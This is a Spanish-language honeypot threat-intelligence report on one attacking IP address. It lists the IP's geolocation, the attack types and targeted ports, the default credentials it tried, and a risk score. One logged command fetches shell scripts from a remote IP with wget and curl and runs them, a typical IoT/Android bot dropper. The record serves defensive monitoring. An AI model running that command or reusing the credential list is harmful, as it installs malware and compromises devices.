TROYANOSYVIRUS
Amenaza ActivaCRITICO

142.248.80.163

Primera Deteccion27/3/2026
Ultima Actividad15/4/2026
ISPAdvin Services LLC
🎯
141
Ataques Totales
🔌
8
Puertos
📡
6
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Desconocida
ASN
AS22295
ISP
Advin Services LLC

Tipos de Ataque

tcp_trap
ssh_telnet_honeypot
yaml_exploit_honeypot
adb_honeypot
web_honeypot
tcp_trap

Puertos Atacados

23804433001555588881700060001

Malware Asociado

1028cc0baa0e7995b048...

Credenciales Intentadas

🔐root/root
1x
🔐root/icatch99
1x
🔐admin/admin
1x
🔐root/(vacio)
1x

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh9x
$echo hello9x
$echo telnet by lamper1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
222222
CPEs
cpe:/a:nodejs:node.jscpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linuxcpe:/a:expressjs:express

Evaluacion de Riesgo

85
/100
BajoMedioAltoCritico